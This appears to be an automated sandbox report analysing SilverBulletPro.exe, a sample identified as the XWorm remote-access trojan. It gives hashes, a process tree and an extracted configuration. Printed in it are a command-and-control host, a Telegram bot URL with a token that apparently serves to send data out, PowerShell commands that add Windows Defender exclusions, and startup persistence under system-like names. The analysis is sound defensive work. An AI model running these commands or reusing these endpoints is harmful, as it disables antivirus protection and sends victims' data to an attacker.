Analysis
-
max time kernel
131s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 21:42
Static task
static1
Behavioral task
behavioral1
Sample
SilverBulletPro.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
SilverBulletPro.exe
Resource
win10v2004-20240508-en
General
-
Target
SilverBulletPro.exe
-
Size
3.3MB
-
MD5
3a05915ef59826910a7935060c9cb8f2
-
SHA1
b89b7bbf347b380d98c56d7261f3780dbdd94290
-
SHA256
ad121ddbed20a93a429f98df9aa1a589f5efd7fe2a579e00a5ea4409ef9d814d
-
SHA512
8c80f88a9738c9fec207f06c86537d2ff32580dd1d6a51deaee1bde318e211669c0eb82a45c350fcd6d54f3ed7c5f628bc472cddc71f0fb29e43931df1c2da1b
-
SSDEEP
49152:lffAbklzCfGDY2G+qnb7IzJunAyDZTk1VQq3/YtjCq3x5ZtztwZFG/i/kvfp:lD8vQQnAZbetlh5Zt5wZF0i/kH
Malware Config
Extracted
xworm
dsasinject-58214.portmap.io:3389
-
Install_directory
%AppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot7023899363:AAFEzgbfWzhyE32Lf95TKSRYEYXMd4AfMyk/sendMessage?chat_id=6354844663
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/200-19-0x0000000000500000-0x000000000051A000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\svchost.exe family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4136 powershell.exe 4472 powershell.exe 4576 powershell.exe 4864 powershell.exe 3720 powershell.exe 3592 powershell.exe 4568 powershell.exe 304 powershell.exe 4940 powershell.exe 312 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SilverBulletPro.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation SilverBulletPro.exe -
Drops startup file 4 IoCs
Processes:
svchost.execsrss.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk csrss.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk csrss.exe -
Executes dropped EXE 5 IoCs
Processes:
SilverBulletPro.exesvchost.execsrss.exeSilverBulletPro44B.tmpSilverBulletPro-v1.5.8.exepid process 3584 SilverBulletPro.exe 200 svchost.exe 5100 csrss.exe 4640 SilverBulletPro44B.tmp 1380 SilverBulletPro-v1.5.8.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
SilverBulletPro.exedescription pid process target process PID 3584 set thread context of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
SilverBulletPro.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance SilverBulletPro.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
csrss.exepid process 5100 csrss.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
powershell.exepowershell.exeSilverBulletPro44B.tmppowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepid process 4136 powershell.exe 4136 powershell.exe 4472 powershell.exe 4136 powershell.exe 4472 powershell.exe 4472 powershell.exe 4640 SilverBulletPro44B.tmp 4640 SilverBulletPro44B.tmp 4640 SilverBulletPro44B.tmp 4640 SilverBulletPro44B.tmp 4640 SilverBulletPro44B.tmp 4640 SilverBulletPro44B.tmp 4576 powershell.exe 4576 powershell.exe 4864 powershell.exe 4576 powershell.exe 4864 powershell.exe 4864 powershell.exe 3592 powershell.exe 3720 powershell.exe 3720 powershell.exe 3592 powershell.exe 3720 powershell.exe 3592 powershell.exe 4568 powershell.exe 4568 powershell.exe 304 powershell.exe 304 powershell.exe 4568 powershell.exe 304 powershell.exe 4940 powershell.exe 4940 powershell.exe 4940 powershell.exe 312 powershell.exe 312 powershell.exe 312 powershell.exe 200 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exepowershell.exepowershell.execsrss.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 200 svchost.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeIncreaseQuotaPrivilege 4136 powershell.exe Token: SeSecurityPrivilege 4136 powershell.exe Token: SeTakeOwnershipPrivilege 4136 powershell.exe Token: SeLoadDriverPrivilege 4136 powershell.exe Token: SeSystemProfilePrivilege 4136 powershell.exe Token: SeSystemtimePrivilege 4136 powershell.exe Token: SeProfSingleProcessPrivilege 4136 powershell.exe Token: SeIncBasePriorityPrivilege 4136 powershell.exe Token: SeCreatePagefilePrivilege 4136 powershell.exe Token: SeBackupPrivilege 4136 powershell.exe Token: SeRestorePrivilege 4136 powershell.exe Token: SeShutdownPrivilege 4136 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeSystemEnvironmentPrivilege 4136 powershell.exe Token: SeRemoteShutdownPrivilege 4136 powershell.exe Token: SeUndockPrivilege 4136 powershell.exe Token: SeManageVolumePrivilege 4136 powershell.exe Token: 33 4136 powershell.exe Token: 34 4136 powershell.exe Token: 35 4136 powershell.exe Token: 36 4136 powershell.exe Token: SeIncreaseQuotaPrivilege 4472 powershell.exe Token: SeSecurityPrivilege 4472 powershell.exe Token: SeTakeOwnershipPrivilege 4472 powershell.exe Token: SeLoadDriverPrivilege 4472 powershell.exe Token: SeSystemProfilePrivilege 4472 powershell.exe Token: SeSystemtimePrivilege 4472 powershell.exe Token: SeProfSingleProcessPrivilege 4472 powershell.exe Token: SeIncBasePriorityPrivilege 4472 powershell.exe Token: SeCreatePagefilePrivilege 4472 powershell.exe Token: SeBackupPrivilege 4472 powershell.exe Token: SeRestorePrivilege 4472 powershell.exe Token: SeShutdownPrivilege 4472 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeSystemEnvironmentPrivilege 4472 powershell.exe Token: SeRemoteShutdownPrivilege 4472 powershell.exe Token: SeUndockPrivilege 4472 powershell.exe Token: SeManageVolumePrivilege 4472 powershell.exe Token: 33 4472 powershell.exe Token: 34 4472 powershell.exe Token: 35 4472 powershell.exe Token: 36 4472 powershell.exe Token: SeDebugPrivilege 5100 csrss.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeIncreaseQuotaPrivilege 4576 powershell.exe Token: SeSecurityPrivilege 4576 powershell.exe Token: SeTakeOwnershipPrivilege 4576 powershell.exe Token: SeLoadDriverPrivilege 4576 powershell.exe Token: SeSystemProfilePrivilege 4576 powershell.exe Token: SeSystemtimePrivilege 4576 powershell.exe Token: SeProfSingleProcessPrivilege 4576 powershell.exe Token: SeIncBasePriorityPrivilege 4576 powershell.exe Token: SeCreatePagefilePrivilege 4576 powershell.exe Token: SeBackupPrivilege 4576 powershell.exe Token: SeRestorePrivilege 4576 powershell.exe Token: SeShutdownPrivilege 4576 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeSystemEnvironmentPrivilege 4576 powershell.exe Token: SeRemoteShutdownPrivilege 4576 powershell.exe Token: SeUndockPrivilege 4576 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 200 svchost.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
SilverBulletPro.exeSilverBulletPro.exesvchost.execsrss.exedescription pid process target process PID 2332 wrote to memory of 3584 2332 SilverBulletPro.exe SilverBulletPro.exe PID 2332 wrote to memory of 3584 2332 SilverBulletPro.exe SilverBulletPro.exe PID 2332 wrote to memory of 200 2332 SilverBulletPro.exe svchost.exe PID 2332 wrote to memory of 200 2332 SilverBulletPro.exe svchost.exe PID 2332 wrote to memory of 5100 2332 SilverBulletPro.exe csrss.exe PID 2332 wrote to memory of 5100 2332 SilverBulletPro.exe csrss.exe PID 3584 wrote to memory of 4136 3584 SilverBulletPro.exe powershell.exe PID 3584 wrote to memory of 4136 3584 SilverBulletPro.exe powershell.exe PID 3584 wrote to memory of 4472 3584 SilverBulletPro.exe powershell.exe PID 3584 wrote to memory of 4472 3584 SilverBulletPro.exe powershell.exe PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 4640 3584 SilverBulletPro.exe SilverBulletPro44B.tmp PID 3584 wrote to memory of 1380 3584 SilverBulletPro.exe SilverBulletPro-v1.5.8.exe PID 3584 wrote to memory of 1380 3584 SilverBulletPro.exe SilverBulletPro-v1.5.8.exe PID 200 wrote to memory of 4576 200 svchost.exe powershell.exe PID 200 wrote to memory of 4576 200 svchost.exe powershell.exe PID 5100 wrote to memory of 4864 5100 csrss.exe powershell.exe PID 5100 wrote to memory of 4864 5100 csrss.exe powershell.exe PID 5100 wrote to memory of 3720 5100 csrss.exe powershell.exe PID 5100 wrote to memory of 3720 5100 csrss.exe powershell.exe PID 200 wrote to memory of 3592 200 svchost.exe powershell.exe PID 200 wrote to memory of 3592 200 svchost.exe powershell.exe PID 5100 wrote to memory of 4568 5100 csrss.exe powershell.exe PID 5100 wrote to memory of 4568 5100 csrss.exe powershell.exe PID 200 wrote to memory of 304 200 svchost.exe powershell.exe PID 200 wrote to memory of 304 200 svchost.exe powershell.exe PID 5100 wrote to memory of 4940 5100 csrss.exe powershell.exe PID 5100 wrote to memory of 4940 5100 csrss.exe powershell.exe PID 200 wrote to memory of 312 200 svchost.exe powershell.exe PID 200 wrote to memory of 312 200 svchost.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe" -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".tmp" -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro44B.tmp"C:\Users\Admin\AppData\Local\Temp\silverbulletapi.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\csrss.exe"C:\ProgramData\csrss.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\csrss.exeFilesize
28KB
MD54d250bcbc14b9b2076b4c651ee3b7deb
SHA1f5cd7173e1797f085b2da82cfa3729e0144bc16b
SHA25641a2f2ca1bdf22fcef635dba5bfd267d32c432aa2f9f00c1574465712d7a5260
SHA5123c3ef5bf7ce6490864256c779493275710645b8cd6087e982b9f49cf1b76f35d1f38799e2641ba5bad00d616aac1eead7b922630795eb88d4a398964365007a2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5cc74e27a6beeb697a3c88a0041c6b23f
SHA173316ab2b236a1e5f3ba19979239d58b50d3e753
SHA2567d20761dbfc669395d8c9f381a289dbba2869a019e0cad24d48bc8fe284ad589
SHA5129d95a2f619b5bee7c4db51f6d3f5240fa34f6709952995e12b0881187a24a71ce3413e77d73fc9ae17e6a14a4a6c534519ac9ace905093cb91b61c72aa4d796d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50244f51f1ead38b84d793c94fade1ae7
SHA10a388717d2cd790e31066225b2bb022f11f4b18b
SHA256d0463a1e512fcd32f5fde672ce2ec7045148c08267d025a9554ac11d3581a9be
SHA51209902570984f205573b011806ea00e3ff657c5db4a8f6716f95b18e89a79dc3e06b1be32dba8c7c9e3a23418cc7f2343da037866aeadddbebba6aee1fa000e6e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57dbf200ee472ad09927bf6c1dda11714
SHA1c5aee4cdbb55a923c94b175e613c318e2e60e75b
SHA2569e6782e433b16d098a28726bb00c8d600e26163df31f39e532208ed05d6f5416
SHA512d749adde8af01047c948674e1cc4084d210a9b175526c369a7553d00362cd3cd8d7d52ba033c2062048d0f98dba2581df3afba488025c58b7f30d10f910d6417
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD566a2c88503fe55a7d7d435768795330d
SHA13d67c8b220ce74fcfcebf77bb82cb64df334a776
SHA256fc86d5781ed8aa5c177f3ee63a49df768ffe9f9b021dc78f9c2ddc6d3a10d0cb
SHA512dc1fcd0b214f44aa9d6abd0880226fd0c94ca6428765bc9997283747c6097f57bea3796bf795f7b411e576206918cf4a0b27f9ed9d8e6003e08ff7988a214b45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ef2198ef73ec430ba1596194fe85dd39
SHA192a8b17865f115c0edf377526b532d7e5bc16caf
SHA2567a74ac50d25c023d2f70b6a9bdd70985b159f1d4962dbacaa1d887399442223a
SHA512ee1e7921b171b66689d9939074cd0c4e37a2bd1b91ef54d6ec9337f04ea1804c141433bbbc34476de7f83f8bd077e0caf153d6dff665aadc1d9db0d96fb8951a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5dcc28f3c755e2b65f3e979d20f79f0ee
SHA10885d4b0aa2863a7e046f6047592c7ce540e07ff
SHA2562850e538981b09b98bf0b4d75f95b73a8687e7df63d4c4c2d8ff34923d0ca8b2
SHA5122c95540b143e0dbeea3a782f171091f22334db04fbd027f5571b1e649c9dea0e5ac2632bdfe12c7fb3cfaf77ec2cdcafd9af5f826e40d03a829903c0497e8358
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exeFilesize
602KB
MD5347d21e54202cc42486f1be0f38ebea1
SHA1f3a17fd7d1581928d8bf773c0f99433da64253db
SHA25680e06ccb6370aca19137d47b6ecf3256d6a34b67a3d4bf0b7c3190a1c5feacad
SHA512620f6318b95253cee873b21b90bdc8f75fb32c30bc42032b9eed5773890a700e66ca3f27f2418bb6b39c8a33f2dea718c2215852e64063e0187131be841950b9
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exeFilesize
3.4MB
MD56d535debd23786b26bf8569d912a00fe
SHA1bcddcbd663f1fa166df4d4517c7fd609d96a4f6d
SHA256e9e776072b437af8866e6771217cebae30a50128fc930f5917b722149efd5b57
SHA51238591fc556bfe7132aacbf9954dbb7c8a39ef364a015ccdc9618f3446555627d4ee57b33d07b77924afc0447c0135c3a93bbc7dc9b7dbad6ef5f286e50cbbd1b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qldye3ph.10i.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
76KB
MD57c1243aac3248ae75cc2bab7bf4dfaba
SHA13dd055ef06380e5886f59b76761132c36e8b3e8f
SHA256dbf81c18b8fa71de185da60a70e41f5799405e5a8331e759b399cab5353a1eda
SHA5123f643f2ec6ca210247eab13abfb2e7e73e0f8621e137c9c1fedc3390fbd5129d78dba438988fa6cf70800def4f60cc2a320e8f269b2bfeaa63bade64c5a2bcbf
-
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro44B.tmpFilesize
1KB
MD586d23632843c402a3a34828bb99317c9
SHA1ee7082dcee56cb61d0cae037078efb2a4b32eaae
SHA256eef04cd51ee4cffc01ea5b13e1bf7a174cc4f093aef143471a31d16e20f9e280
SHA5129a5fcf3158c96be1a48dff04d58ec15471d69f44a6a06ea5f2fcd2c858bd974bbfbfe31028cc85a321ae55f5d621038c5234dcf01757682c399b91dc007cb223
-
memory/200-19-0x0000000000500000-0x000000000051A000-memory.dmpFilesize
104KB
-
memory/2332-0-0x00007FF80A4D0000-0x00007FF80A6AB000-memory.dmpFilesize
1.9MB
-
memory/2332-25-0x00007FF80A4D0000-0x00007FF80A6AB000-memory.dmpFilesize
1.9MB
-
memory/2332-2-0x00007FF80A4D0000-0x00007FF80A6AB000-memory.dmpFilesize
1.9MB
-
memory/2332-1-0x0000000000680000-0x00000000009C8000-memory.dmpFilesize
3.3MB
-
memory/3584-180-0x0000000140000000-0x000000014012A000-memory.dmpFilesize
1.2MB
-
memory/3584-18-0x0000000140000000-0x000000014012A000-memory.dmpFilesize
1.2MB
-
memory/4136-37-0x000002B6AD0F0000-0x000002B6AD166000-memory.dmpFilesize
472KB
-
memory/4136-31-0x000002B6ACDC0000-0x000002B6ACDE2000-memory.dmpFilesize
136KB
-
memory/4640-118-0x0000000000110000-0x0000000000111000-memory.dmpFilesize
4KB
-
memory/4640-137-0x0000000140000000-0x0000000140641000-memory.dmpFilesize
6.3MB
-
memory/4640-177-0x0000000140000000-0x0000000140641000-memory.dmpFilesize
6.3MB
-
memory/5100-26-0x0000000000D70000-0x0000000000D7E000-memory.dmpFilesize
56KB